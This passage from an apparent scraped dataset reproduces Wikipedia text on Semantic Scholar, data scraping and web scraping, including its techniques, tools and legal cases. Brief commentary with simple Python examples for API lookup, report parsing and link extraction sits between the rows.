27 (2). doi:10.1093 jtm taaa021. PMID 32052846. S2CID 211099356. Semantic Scholar is free to use and unlike similar search engines (i.e. Google Scholar) does not search for material that is behind a paywall. 
5 citation needed One study compared the index scope of Semantic Scholar to Google Scholar, and found that for the papers cited by secondary studies in computer science, the two indices had comparable coverage, each only missing a handful of the papers. 17 As of January 2018, following a 2017 project that added biomedical papers and topic summaries, the Semantic Scholar corpus included more than 40 million papers from computer science and biomedicine. 18 In March 2018, Doug Raymond, who developed machine learning initiatives for the Amazon Alexa platform, was hired to lead the Semantic Scholar project. 19 As of August 2019 update , the number of included papers metadata (not the actual PDFs) had grown to more than 173 million 20 after the addition of the Microsoft Academic Graph records. 21 In 2020, a partnership between Semantic Scholar and the University of Chicago Press Journals made all articles published under the University of Chicago Press available in the Semantic Scholar corpus. 22 At the end of 2020, Semantic Scholar had indexed 190 million papers. 23 In 2020, Semantic Scholar reached seven million users per month. 7 |
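The scraped entry above shows a citation carrying an S2CID (Semantic Scholar Corpus ID). As a hedged sketch of how such an identifier could be resolved programmatically, the snippet below calls Semantic Scholar's public Graph API; the endpoint path and the CorpusID: prefix are assumptions based on that API's documented conventions and may change, so treat this as illustrative only.

import requests

def lookup_s2cid(corpus_id):
    # Assumed endpoint: address a paper by the Corpus ID printed as "S2CID" above.
    url = f"https://api.semanticscholar.org/graph/v1/paper/CorpusID:{corpus_id}"
    resp = requests.get(url, params={"fields": "title,year,externalIds"}, timeout=10)
    resp.raise_for_status()
    return resp.json()

# Example using the S2CID from the scraped citation:
# print(lookup_s2cid(211099356).get("title"))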
506 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-1 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
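The report-mining approach described above (redirecting a printer-style report to a spool file and parsing it offline) can be sketched with pandas, which this notebook already uses for tabular data. The fixed-width report below is a made-up illustration, not the output of any particular ERP system.

import pandas as pd
from io import StringIO

# Hypothetical spool-file excerpt: a fixed-width, human-readable report of the
# kind report mining targets (column names and widths are illustrative only).
report = StringIO(
    "ORDER  CUSTOMER        AMOUNT\n"
    "10001  Acme Corp       199.00\n"
    "10002  Globex Ltd       54.50\n"
)

# read_fwf infers the fixed-width column boundaries, turning the printed report
# back into structured rows suitable for offline analysis.
df = pd.read_fwf(report)
print(df)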
507 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-13 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
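The scraped article above lists BeautifulSoup among common scraping tools and describes fetching a page and then extracting data from it. A minimal sketch consistent with the libraries already imported in this notebook (requests and BeautifulSoup) is shown below; the target URL in the usage comment is simply one of the pages scraped in the rows above, and the link-collecting logic is only an example to adapt.

import requests
from bs4 import BeautifulSoup

def extract_links(url, limit=10):
    # Fetch the page, parse it into a tree, and pull anchor text and hrefs.
    resp = requests.get(url, timeout=10, headers={"User-Agent": "example-scraper/0.1"})
    resp.raise_for_status()
    soup = BeautifulSoup(resp.text, "html.parser")
    links = []
    for a in soup.find_all("a", href=True):
        text = a.get_text(strip=True)
        if text:
            links.append((text, a["href"]))
        if len(links) >= limit:
            break
    return links

# Example (one of the pages that appears in the scraped rows above):
# for text, href in extract_links("https://en.wikipedia.org/wiki/Web_scraping"):
#     print(text, "->", href)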
508 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-5 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania,[17] e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200–300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC.[18] QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices.[19] In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned.[20][21] In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA.[22] On this review, the Ninth Circuit upheld its prior decision.[23] Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws.[citation needed] In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union.[24] In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship.[25] The decision is under appeal in Ireland's Supreme Court.[26]
